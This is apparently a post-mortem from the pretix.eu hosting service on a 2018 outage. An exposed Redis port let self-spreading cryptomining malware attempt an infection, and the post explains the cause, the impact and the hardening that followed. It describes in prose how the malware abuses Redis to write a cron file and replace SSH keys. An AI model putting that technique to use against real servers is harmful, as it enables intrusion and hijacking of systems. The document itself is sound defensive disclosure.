pretix.eu incident post-mortem

19. Feb. 2018

Yesterday morning, the pretix.eu Hosted service was unavailable for approximately 36 minutes. When analyzing the outage, we discovered a severe security vulnerability in our hosting setup that we fixed shortly afterwards.

We firmly believe that no customer data was impacted so we do not expect any damage to arise from this. There is no action required on your side. This problem was caused by human oversight and could happen anywhere, but as part of our efforts to be as transparent and honest as possible with you, we want to share all the details of this incident.

To be clear, this issue only concerned our hosting service, users of the Community or Enterprise editions are not affected (unless you have similar mistakes in your server setup).

What happened?

Due to a firewall misconfiguration, it was possible to access our Redis cluster without authentication when guessing the correct IP address and port number. This port was open for approximately 5 days which we noticed on the morning of February 18th, 2018. The following is a timeline of the events on that day.

On Sunday morning at 07:39 CET, a server infected with the "Linux Lady Malware" (LLM) attempted to automatically propagate the malware to our servers using redis as an attack vector. LLM is a self-spreading malware intended to mine cryptocurrencies for its creator.

LLM spreads to more servers by generating a random IP address and then trying to connect to standard redis ports. It then issues a series of commands to re-configure redis to save its persistent storage to /var/spool/cron/root instead of the normal location. By changing /var/spool/cron/root, it is then able to execute code to download a shell script that replaces all SSH keys with keys of the malware author and installs the actual payload. The linked blogpost describes a detailed analysis of the malware.

Luckily for us, /var/spool/cron/root simply does not exist on our systems. Therefore, the installation routine of the malware failed at the very first step. No keys have been replaced, no foreign code has been executed and no coin has been mined. Even if the file would have existed, our redis cluster is not running as the root user but as an unprivileged user with limited access. The only consequence for our server was that the redis instance stopped working due to the incorrect storage location.

Our automatic monitoring then noticed the issue and issued the first alert at 07:42. Since this was early on a Sunday morning, no-one reacted to the text alert. In this case, our monitoring system starts to issue wake-up calls to our team fifteen minutes later. At 07:59, someone was able to log in to the server and started researching the problem. Another fifteen minutes later, at 08:15, we had identified the incorrect redis configuration as the cause of the outage and restarted the redis cluster with a clean configuration. From this moment, pretix was available again after a downtime of 36 minutes.

We then immediately started researching possible causes of this problem on the internet and learned about the malware mentioned above. It took us another few minutes to identify the hole in our firewall setup and we were able to close it by approximately 08:25.

To limit the possible impact of this issue, we then invalidated all user sessions, forcing everyone to re-login (see below for further details on this) at approximately 08:30. We then manually verified that there were no visible traces of successful installations of similar malware.

How did the misconfiguration happen?

We make extensive use of Ansible to automatically configure and instrument all our servers. Whenever we add or replace a server in our cluster, we just execute the required set of Ansible roles on the server.

As part of our Ansible set-up process, we configure a firewall on all our servers and every Ansible role that installs a special service includes the desired firewall configuration for this service. However, the Ansible paybooks do not automatically enable the firewall, this needs to be done manually once for every server . This is a precaution to prevent locking out SSH access in case the Ansible provisioning fails halfway.

Last week, we added a new application worker node to our cluster to improve performance of the overall system. Our application worker nodes are not part of the redis clusters themselves, but run a HAProxy instance that always routes redis connection requests to the current master of our redis cluster. For this new node, we forgot to manually enable the firewall. Even though other services are running on this machine, this redis port was the only service that was openly accessible.

What is the impact of this?

Our redis cluster is used for caching of public information and of temporary session data. Our session data does not usually contain personal information, except for a very short period of time during the ticket checkout process. The more interesting data contained in our redis cluster are the IDs of the sessions themselves.

Theoretically, they would allow to log in to pretix as any of these sessions and gain access to the administrative backend. However, we strongly believe that nobody did this for the following reasons:

The vulnerability was only present for approximately five days and was only possible to discover randomly. Exploiting it would require (a) an advanced manual attack or (b) a complete dump of the redis cluster that is later analyzed manually. We have found no sign of any unauthorized access except for the attempted malware attack outlined above.
It is not trivially visible from the tens of thousands of sessions which session is still valid and it is impossible to tell which session has extensive permissions to access the backend. Therefore, an attacker would need to issue a huge number of HTTP requests to try out the session IDs. In the relevant timeframe, we can not see a statistically significant increase or peak in HTTP requests. Even if the attacker would guess a working session ID, they would need to issue a huge number of HTTP requests to extract a relevant amount of customer data. We do not see any patterns that look like automatic scraping on our access logs.

We are therefore confident that no customer data has been leaked. If someone indeed has dumped our redis cluster and did not analyse it so far, this data is now completely useless as we invalidated all sessions and the possibly stolen session IDs can no longer be used to log in.

What do we do to prevent this in the future?

As mentioned above, we enabled the firewall on the misconfigured server less than an hour after we learned of the issue. However, whenever we encounter an issue with the availability or security of our system, our ambition is not only to fix the issue currently at hand, but to take extensive measures to prevent the entire class of problem to happen again.

In this particular case, there were multiple classes of problems involved. Therefore, we also performed the following changes:

Our monitoring system now automatically probes all of our servers for all typical vulnerable open ports every couple of minutes. Every open port that belongs to a well-known database system or similar service will now immediately trigger an alert when not explicitly whitelisted for that server. This should rule out most simple misconfigurations of our firewalls in the future.
We enabled redis' authentication feature. With this change, access to our redis cluster is no longer possible even if a TCP connection would be allowed because there is a hole in our firewall or an attacker is within our network. Unfortunately, this configuration change caused another short downtime today around noon.
We've hardened our session storage backend. We no longer use the session keys as keys in our redis instance, but instead use an authenticated hash based on the session key itself and the application's SECRET_KEY. This way, even with a complete leak of the redis cluster, it would be close impossible to impersonating a session. The SECRET_KEY is not known to the machines running the redis cluster. This change will not immediately ship with pretix for on-site evaluations as it requires additional effort to allow for backwards compatibility. We will look into shipping it with pretix in the future.
We've hardened our session layer to make it harder to steal a backend session, even when sessions ID get leaked: Sessions are now pinned to the hash of the browser's user agent. Since the user agent is only stored hashed, this does not create a privacy regression and also makes it much harder to take over a session even if you know the session ID, since you also need to know the exact user agent. This change will be available to all installations with the next pretix release. We are also looking into options of using GeoIP services to notify users about logins from countries they do not usually log in from.
Our manual checklist for installing new servers has been extended to explicitly include activation of the firewall.

We are optimistic that these steps will make it hard for us to miss any further firewall misconfigurations -- and that they will make any data contained in our redis data store nearly useless to any attacker. Some other (completely unrelated) attack vectors will also be less feasible to exploit with the newly hardened session system.

We take the security of our service very seriously and always go the extra mile to make sure you stay safe. As we are humans, security issues might unfortunately still occur from time to time. We deeply apologize for this and we do everything in our power to find and fix such problems as timely as we can. If you notice any security problems or have any questions on this topic, please contact us in private at support@pretix.eu. We will always treat your message with the appropriate priority.

Raphael Michel

Raphael ist Gründer und Geschäftsführer von pretix und leitet unsere Entwicklungsabteilung. Er begeistert sich für benutzerfreundliche, elegante Software und wenn er nicht zu beschäftigt mit pretix ist, organisiert er gerne selbst Konferenzen mit.